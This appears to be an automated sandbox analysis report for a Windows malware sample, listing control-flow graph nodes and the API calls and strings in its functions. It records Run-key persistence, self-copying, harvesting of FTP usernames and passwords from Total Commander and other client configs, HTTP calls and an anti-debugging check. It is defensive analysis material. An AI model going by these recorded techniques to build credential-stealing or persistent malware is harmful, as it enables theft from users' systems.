6715 404b18 6713->6715 6714->6713 6716 404b27 6715->6716 6717 404b1d 6715->6717 6719 40be3a HeapFree 6716->6719 6718 4033a0 HeapFree 6717->6718 6720 404b25 6718->6720 6719->6720 6721 405136 6720->6721 6723 405150 6721->6723 6722 40848f 7 API calls 6722->6723 6723->6722 6724 40520b 6723->6724 6725 4051e0 ExpandEnvironmentStringsW 6723->6725 6727 405211 6724->6727 6728 40521b 6724->6728 6726 404e7b 8 API calls 6725->6726 6726->6723 6729 4033a0 HeapFree 6727->6729 6730 40be3a HeapFree 6728->6730 6731 405219 6729->6731 6730->6731 6732 405229 6731->6732 6733 405238 6732->6733 6734 407b4e 9 API calls 6733->6734 6735 4052e8 6734->6735 6736 406d14 2 API calls 6735->6736 6739 405361 Sleep 6735->6739 6742 405372 6735->6742 6736->6735 6737 40537c Sleep 6737->6742 6739->6735 6740 4053cb Sleep 6740->6742 6741 4053e0 6742->6737 6742->6740 6742->6741 6797 409df4 6742->6797 6744 4084af 6743->6744 6747 4084c5 6743->6747 6761 40845d RegQueryValueExW 6744->6761 6746 403796 6746->6630 6746->6638 6747->6746 6764 40bfd0 6747->6764 6749 408518 6750 40852e 6749->6750 6751 40851f ExpandEnvironmentStringsW 6749->6751 6752 408531 GetProcessHeap HeapFree 6750->6752 6751->6750 6751->6752 6752->6746 6754 4034bc 6753->6754 6755 408248 8 API calls 6754->6755 6756 40350a 6755->6756 6756->6638 6760 4033a4 6757->6760 6758 40be3a HeapFree 6759 4033d7 6758->6759 6759->6636 6760->6758 6762 408482 RegCloseKey 6761->6762 6763 40847f 6761->6763 6762->6747 6763->6762 6765 40bfd7 6764->6765 6766 40bfda 6764->6766 6765->6749 6767 40bff3 6766->6767 6770 40be27 HeapAlloc 6766->6770 6767->6749 6769 40bffa 6769->6749 6770->6769 6772 403a1a GetPrivateProfileStringW 6771->6772 6775 403bb9 PathRemoveFileSpecW 6771->6775 6773 403a36 6772->6773 6784 403baf 6772->6784 6776 403a48 HeapAlloc 6773->6776 6773->6784 6774 40be3a HeapFree 6774->6775 6775->6654 6776->6784 6785 403a64 6776->6785 6777 403ac8 StrStrIW 6778 403add StrStrIW 6777->6778 6777->6785 6779 403af2 GetPrivateProfileStringW 6778->6779 6778->6785 6780 
403b09 GetPrivateProfileStringW 6779->6780 6779->6785 6781 403b26 GetPrivateProfileStringW 6780->6781 6780->6785 6781->6785 6782 403ba9 6783 40be3a HeapFree 6782->6783 6783->6784 6784->6774 6785->6777 6785->6782 6786 40c3f9 wvnsprintfW 6785->6786 6787 40c00b 3 API calls 6785->6787 6786->6785 6787->6785 6789 4039b7 6788->6789 6790 408248 8 API calls 6789->6790 6791 4039e5 6790->6791 6791->6654 6792->6693 6794 40856f 6793->6794 6796 408585 6793->6796 6795 40845d 2 API calls 6794->6795 6795->6796 6796->6701 6798 409e01 6797->6798 6810 40beea 6798->6810 6801 409eb1 HttpOpenRequestW 6802 409ead 6801->6802 6803 409ecf HttpSendRequestW 6801->6803 6802->6742 6805 40be3a HeapFree 6803->6805 6806 409eea 6805->6806 6806->6802 6807 409eef InternetReadFile 6806->6807 6807->6802 6808 409f0c 6807->6808 6818 40bf35 6808->6818 6812 40bef4 6810->6812 6822 40beb4 6812->6822 6814 409e3e InternetConnectW 6814->6801 6814->6802 6816 40bf1c 6816->6814 6817 40beb4 WideCharToMultiByte 6816->6817 6817->6814 6819 40bf3a 6818->6819 6820 40bf3f MultiByteToWideChar 6818->6820 6819->6820 6821 40bf58 6820->6821 6821->6802 6823 40bec3 WideCharToMultiByte 6822->6823 6824 40bebe 6822->6824 6825 40bedd 6823->6825 6824->6823 6825->6814 6826 40be27 HeapAlloc 6825->6826 6826->6816 7004 40d2ac 7005 40d2ca 7004->7005 7007 40d378 __except_handler3 7004->7007 7006 40d790 __except_handler3 2 API calls 7005->7006 7009 40d2e5 __except_handler3 __except_handler4 _CallDestructExceptionObject 7006->7009 7008 40d110 __except_handler3 RtlUnwind 7008->7009 7009->7007 7009->7008 7010 402cad 7011 406c77 3 API calls 7010->7011 7012 402cc3 7011->7012 7013 406cb5 GetVersionExW 7012->7013 7014 402cc8 7013->7014 7015 40a8f9 34 API calls 7014->7015 7016 402cdb 7015->7016 7017 40267a 122 API calls 7016->7017 7018 402d00 7017->7018 7019 409c6f SysFreeString 7018->7019 7020 402d08 7019->7020 7021 4032af ExitProcess 7026 402c32 7027 40267a 122 API calls 7026->7027 7028 402c56 7027->7028 7029 409c6f SysFreeString 7028->7029 7030 
402c5e 7029->7030 6827 402df3 6828 406c77 3 API calls 6827->6828 6829 402e08 6828->6829 6830 406cb5 GetVersionExW 6829->6830 6831 402e0d 6830->6831 6832 40a8f9 34 API calls 6831->6832 6833 402e20 6832->6833 6834 40267a 122 API calls 6833->6834 6835 402e39 6834->6835 7031 4094b6 7032 4094c9 7031->7032 7033 4094cd 7032->7033 7034 4094f3 CharLowerW CharLowerW 7032->7034 7035 4094e3 SysFreeString 7032->7035 7037 409560 7034->7037 7039 409512 7034->7039 7036 40957e 7035->7036 7038 40956f SysFreeString SysFreeString 7037->7038 7038->7036 7039->7037 7039->7038 7040 40953a CharLowerW 7039->7040 7041 409544 7040->7041 7042 40956a SysFreeString 7041->7042 7042->7038 7043 402db7 7044 40267a 122 API calls 7043->7044 7045 402dd1 7044->7045 7046 40183a 7047 401854 7046->7047 7048 408091 3 API calls 7047->7048 7051 401958 7047->7051 7049 40194a 7048->7049 7050 408091 3 API calls 7049->7050 7050->7051 7054 402e3e 7064 402e4d 7054->7064 7055 40327c 7056 402eb7 GetModuleFileNameW 7057 402ed6 GetCurrentDirectoryW 7056->7057 7056->7064 7057->7064 7058 402f2a GetLastError 7059 40a786 35 API calls 7058->7059 7059->7064 7060 403251 GetLastError 7060->7064 7061 403237 GetLastError 7061->7064 7062 40a786 35 API calls 7062->7064 7063 407552 Sleep 7063->7064 7064->7055 7064->7056 7064->7058 7064->7060 7064->7061 7064->7062 7064->7063 7065 40253c 50 API calls 7064->7065 7065->7064 7077 403bbf 7078 40821c PathCombineW 7077->7078 7079 403bdf 7078->7079 7080 403bf9 7079->7080 7081 403bfe 7079->7081 7082 403bee 7079->7082 7084 4039ea 12 API calls 7081->7084 7083 4039a3 8 API calls 7082->7083 7083->7080 7084->7080

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                          • FindFirstFileW.KERNEL32(?,00000000), ref: 0040AC03
                          • FindClose.KERNEL32(00000000), ref: 0040AC0F
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FindOpen$CloseFileFirst
                          • String ID:
                          • API String ID: 3155378417-0
                          • Opcode ID: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                          • Instruction ID: fa0310e4c65bbc590993533f650c85f5e3ee77ef27cd51fa1c8f473dbf319076
                          • Opcode Fuzzy Hash: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                          • Instruction Fuzzy Hash: 5DE0D87160C7044BE220E7B49D0C967B3DCAB45325F000F36A9B6E20C0FA38D46A465F

                          Control-flow Graph

                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B36C
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B39D
                            • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                          • GetLastError.KERNEL32(00000004), ref: 0040B3CA
                          • Sleep.KERNEL32(00002710), ref: 0040B3F7
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B413
                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0040B435
                          • ExitProcess.KERNEL32 ref: 0040B44D
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                          • GetLastError.KERNEL32(00000004), ref: 0040B48D
                          • GetLastError.KERNEL32(00000004), ref: 0040B49A
                          • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 0040B4C7
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B4D7
                          • GetLastError.KERNEL32(00000004), ref: 0040B500
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$ErrorLastModuleName$Open$CopyCreateEnvironmentExitExpandProcessSleepStrings
                          • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$opeqmc.exe
                          • API String ID: 3692109554-477663111
                          • Opcode ID: 55bb52feb6c62d8aec5773147cbc2c373a20a80f20ddf5eadf9f4fa8ccd6a04a
                          • Instruction ID: ccf8aad4361994264e72a39918ed7d53ff083e628d4a69ee62a5d407c68d8035
                          • Opcode Fuzzy Hash: 55bb52feb6c62d8aec5773147cbc2c373a20a80f20ddf5eadf9f4fa8ccd6a04a
                          • Instruction Fuzzy Hash: 8C4127719042186AE710B7A19D46FAB73ACEF04345F14447BBB05F11C2EB789A548AAF

                          Control-flow Graph

                          APIs
                          • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                          • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                          • GetFileSize.KERNEL32(?,00000000), ref: 0040762E
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407638
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0040763F
                          • ReadFile.KERNELBASE(?,00000000,00000000,?,00000000), ref: 00407660
                          • WriteFile.KERNELBASE(?,?,00000000,?,00000000), ref: 0040767F
                          • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000), ref: 00407691
                          • ReadFile.KERNELBASE(?,?,00000040,?,00000000), ref: 004076A1
                          • SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 004076AF
                          • ReadFile.KERNELBASE(?,?,000000F8,?,00000000), ref: 004076C5
                          • SetFilePointer.KERNELBASE(?,?,00000000,00000000), ref: 004076EF
                          • WriteFile.KERNELBASE(?,?,000000F8,?,00000000), ref: 00407705
                          • CloseHandle.KERNELBASE(?), ref: 00407714
                          • CloseHandle.KERNEL32(?), ref: 00407719
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$PointerRead$CloseCreateHandleHeapWrite$AllocateProcessSize
                          • String ID:
                          • API String ID: 2296163861-0
                          • Opcode ID: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
                          • Instruction ID: 7ae3b020874f099f6a4231377d147a855b3f50186be4225f3fece46b7b724b47
                          • Opcode Fuzzy Hash: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
                          • Instruction Fuzzy Hash: F0416A71901028BADB209BA2DD48EEFBF7DEF45390F104476F619F21A0D7709A10DB64

                          Control-flow Graph

                          APIs
                          • RegOpenKeyExW.KERNELBASE(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                          • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                            • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                            • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Open$CloseQueryValue
                          • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                          • API String ID: 3546245721-4228964922
                          • Opcode ID: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                          • Instruction ID: 3bac8edf5f415b784fe4546894dc74dc09b9405a13c640cee1cd261e7a9a2bb6
                          • Opcode Fuzzy Hash: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                          • Instruction Fuzzy Hash: 5F01867265430EFEFF1096919D42F9A736CDB40768F210036FA00B60D1D6B6AE155779

                          Control-flow Graph

                          APIs
                          • GetCommandLineW.KERNEL32(?,0040B3E5), ref: 0040AB0A
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000820,00000400,?,0040B3E5), ref: 0040AB44
                          • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB57
                          • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB60
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CharLower$CommandFileLineModuleName
                          • String ID: /nomove
                          • API String ID: 1338073227-1111986840
                          • Opcode ID: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                          • Instruction ID: b8029fc6669f79c45f6caaa8ce38406425976cf3cabd4088da44db58d281c6d8
                          • Opcode Fuzzy Hash: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                          • Instruction Fuzzy Hash: 7CF01D7290022956DB10A7B19C05BDB72ACFF40309F0445B6AA05F2180ED78EA548F95

                          Control-flow Graph

                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400,771B0900,00000400,00000000,0040B4B3,00000000), ref: 00407744
                          • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 00407784
                          • GetLastError.KERNEL32(00000004), ref: 004077A9
                            • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                            • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$Create$EnvironmentErrorExpandLastModuleNameStrings
                          • String ID:
                          • API String ID: 1536607067-0
                          • Opcode ID: eafcbf4a8c3930913d522f5c7b72beb30a71f0d0c1af5e3f4189f884763461bb
                          • Instruction ID: de8f4f1c442ba604be96c6aabbb627c7d922d162aa2fadd5385f895ae0141ebd
                          • Opcode Fuzzy Hash: eafcbf4a8c3930913d522f5c7b72beb30a71f0d0c1af5e3f4189f884763461bb
                          • Instruction Fuzzy Hash: AD11E972908249AED720D7A19C81FEB739CFB44354F10483BFB95E30D0E678B945866B

                          Control-flow Graph

                          APIs
                          • _memset.LIBCMT ref: 00407800
                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,?,?,?,?,00000400), ref: 0040781B
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CreateProcess_memset
                          • String ID:
                          • API String ID: 1177741608-0
                          • Opcode ID: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                          • Instruction ID: 3694313203bda926a09df6f19e1a61ce713b6a49f930e6e3ed03be73a1123fdc
                          • Opcode Fuzzy Hash: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                          • Instruction Fuzzy Hash: 1DE048B294113876DB20A6E69C0DDDF7F6CDF06694F000121BA0EE50C4E5749608C6F5

                          Control-flow Graph

                          APIs
                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                          • RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CloseQueryValue
                          • String ID:
                          • API String ID: 3356406503-0
                          • Opcode ID: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                          • Instruction ID: 7cb27e63b8b96f7a1a34dd7d249ffcc2d4336ce0f7aa5f451266b78b49120899
                          • Opcode Fuzzy Hash: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                          • Instruction Fuzzy Hash: DCE06D7A000208BBEF104F94CD09BD97BB9EB44358F208464BA00A6150D67596149B14

                          Control-flow Graph

                          APIs
                          • HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                          • HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
                          • StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                          • StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,000001FE,000000FF,?), ref: 00403B20
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,000000FF,?), ref: 00403B36
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: PrivateProfileString$AllocHeap
                          • String ID: SOFTWARE\Ghisler\Total Commander$connections$default$ftp://%s:%s@%s$host$password$username
                          • API String ID: 2479592106-2015850556
                          • Opcode ID: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
                          • Instruction ID: 106d3b010c48b16868dcb071ba678aa04ac33b338b72d514ced31169f03d36dc
                          • Opcode Fuzzy Hash: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
                          • Instruction Fuzzy Hash: A2513D71900109BAEB11EFA5DD41EAEBBBDEF44308F204077E904F6292D775AF068B58

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00406A68: RegOpenKeyExW.ADVAPI32(80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current,00000000,00000001,?,00420840,?,00000000), ref: 00406A8C
                            • Part of subcall function 00406ADF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A
                          • GetSystemMetrics.USER32(00000000), ref: 004032E5
                          • GetSystemMetrics.USER32(00000001), ref: 004032ED
                          • VirtualProtect.KERNEL32(75A90B80,0000000A,00000008,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403309
                          • VirtualProtect.KERNEL32(75A90B88,0000000A,?,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403333
                          • SetUnhandledExceptionFilter.KERNEL32(004032AF,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 0040333A
                          • LoadLibraryW.KERNEL32(atl,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403345
                          • GetProcAddress.KERNEL32(00000000,AtlAxWinInit), ref: 0040335D
                          • GetProcAddress.KERNEL32(00000000,AtlAxAttachControl), ref: 0040336A
                          • GetProcAddress.KERNEL32(00000000,AtlAxGetControl), ref: 00403377
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$MetricsOpenProtectSystemVirtual$ExceptionFilterLibraryLoadUnhandled
                          • String ID: AtlAxAttachControl$AtlAxGetControl$AtlAxWinInit$atl
                          • API String ID: 3066332896-2664446222
                          • Opcode ID: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                          • Instruction ID: 61d9a237d914756188f526d52bf2e891562662c8e4878cb3977fb5d3c9d5a9bd
                          • Opcode Fuzzy Hash: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                          • Instruction Fuzzy Hash: E6212771900390EED3019FBAAD84A5A7FE8EB5B31171545BBE556F32A0C7B80902CB79
                          APIs
                            • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                          • HeapAlloc.KERNEL32(00000008,00020002), ref: 00403566
                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 0040358A
                          • HeapAlloc.KERNEL32(00000008,00000C20), ref: 004035B5
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403639
                          • GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 00403653
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 00403681
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: PrivateProfile$String$AllocHeap$CombinePath
                          • String ID: ftp://%s:%s@%s:%u$pass$port$user
                          • API String ID: 3432043379-2696999094
                          • Opcode ID: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
                          • Instruction ID: ca29095f8650abd3188745a74e72d347e34b1f07fc40ddfd65b33f15b90f053b
                          • Opcode Fuzzy Hash: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
                          • Instruction Fuzzy Hash: D3515FB2104606AFE710EF61DC81EABBBEDEB88304F10493BF554A32D1D735DA058B56
                          APIs
                            • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                          • FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                          • PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                          • Sleep.KERNEL32(00000000), ref: 00408342
                          • Sleep.KERNEL32(00000000), ref: 00408377
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                          • FindClose.KERNEL32(00000000), ref: 004083B9
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
                          • String ID: .$.$.8@$.8@
                          • API String ID: 2348139788-2639049386
                          • Opcode ID: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
                          • Instruction ID: 14d48cc84805742e6106b0fbd309534a1a80b5d2ede52edf6fcc6a53e93a4421
                          • Opcode Fuzzy Hash: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
                          • Instruction Fuzzy Hash: 35414F3140021DABCF219F50DE49BDE7B79AF84708F0401BAFD84B11A1EB7A9DA5CB59
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 0040D0C4
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040D0D9
                          • UnhandledExceptionFilter.KERNEL32(0040E248), ref: 0040D0E4
                          • GetCurrentProcess.KERNEL32(C0000409), ref: 0040D100
                          • TerminateProcess.KERNEL32(00000000), ref: 0040D107
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                          • String ID:
                          • API String ID: 2579439406-0
                          • Opcode ID: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
                          • Instruction ID: 078c109d1665b9b830d76e00ceeb27c9797f204ae48b5850d213398ac2e03a3c
                          • Opcode Fuzzy Hash: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
                          • Instruction Fuzzy Hash: 7F21CEB8801244DFD700DF59F945A857BF4BB08385F0086BAE708E76B0E7B458808F0D

                          Control-flow Graph

                          control_flow_graph 174 40b096-40b0ac call 40d5b0 177 40b0b5-40b0bb 174->177 178 40b0ae-40b0b0 174->178 180 40b0bd-40b0cd call 407995 177->180 181 40b0cf-40b0d1 call 407951 177->181 179 40b2c9-40b2cd 178->179 185 40b0d6-40b0e5 180->185 181->185 186 40b160-40b166 185->186 187 40b0e7-40b0f1 185->187 189 40b177 InternetClearAllPerSiteCookieDecisions 186->189 190 40b168-40b175 InternetSetPerSiteCookieDecisionW 186->190 187->186 188 40b0f3-40b0f9 187->188 188->186 192 40b0fb-40b10b GetModuleFileNameW 188->192 191 40b17d-40b184 call 4032b8 189->191 190->191 199 40b186-40b196 GetLastError call 40a786 191->199 200 40b199-40b1a2 191->200 194 40b116-40b118 GetCurrentDirectoryW 192->194 195 40b10d-40b114 call 406cf9 192->195 198 40b11e-40b15a call 405511 call 4054ed call 40253c 194->198 195->198 198->178 198->186 199->200 204 40b1a9-40b1ae 200->204 207 40b1b0-40b1cd CreateThread 204->207 208 40b1ce-40b1df 204->208 207->208 208->204 210 40b1e1-40b1e7 208->210 212 40b1e9-40b1eb 210->212 213 40b1ed-40b200 call 40a786 210->213 212->213 215 40b221-40b226 212->215 222 40b202-40b209 call 40b023 213->222 223 40b20e-40b210 213->223 218 40b228-40b23b CloseHandle 215->218 219 40b23d-40b24b call 40a6c9 InternetClearAllPerSiteCookieDecisions 215->219 218->218 218->219 227 40b2c6-40b2c8 219->227 228 40b24d-40b257 219->228 222->223 223->215 225 40b212-40b21b WaitForMultipleObjects 223->225 225->215 227->179 228->227 229 40b259-40b25f 228->229 229->227 230 40b261-40b271 GetModuleFileNameW 229->230 231 40b273-40b27a call 406cf9 230->231 232 40b27c-40b27e GetCurrentDirectoryW 230->232 234 40b284-40b2c0 call 405511 call 4054ed call 40253c 231->234 232->234 234->178 234->227
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000,00000000,00000000,00000000,?,0040B320,00000000,?,0040B3E0), ref: 0040B103
                          • InternetSetPerSiteCookieDecisionW.WININET(begun.ru,00000005), ref: 0040B16F
                          • GetLastError.KERNEL32(00000004,?,0040B320,00000000,?,0040B3E0), ref: 0040B188
                          • CreateThread.KERNEL32(00000000,00000000,Function_0000B023,?,00000000,00000000), ref: 0040B1C3
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
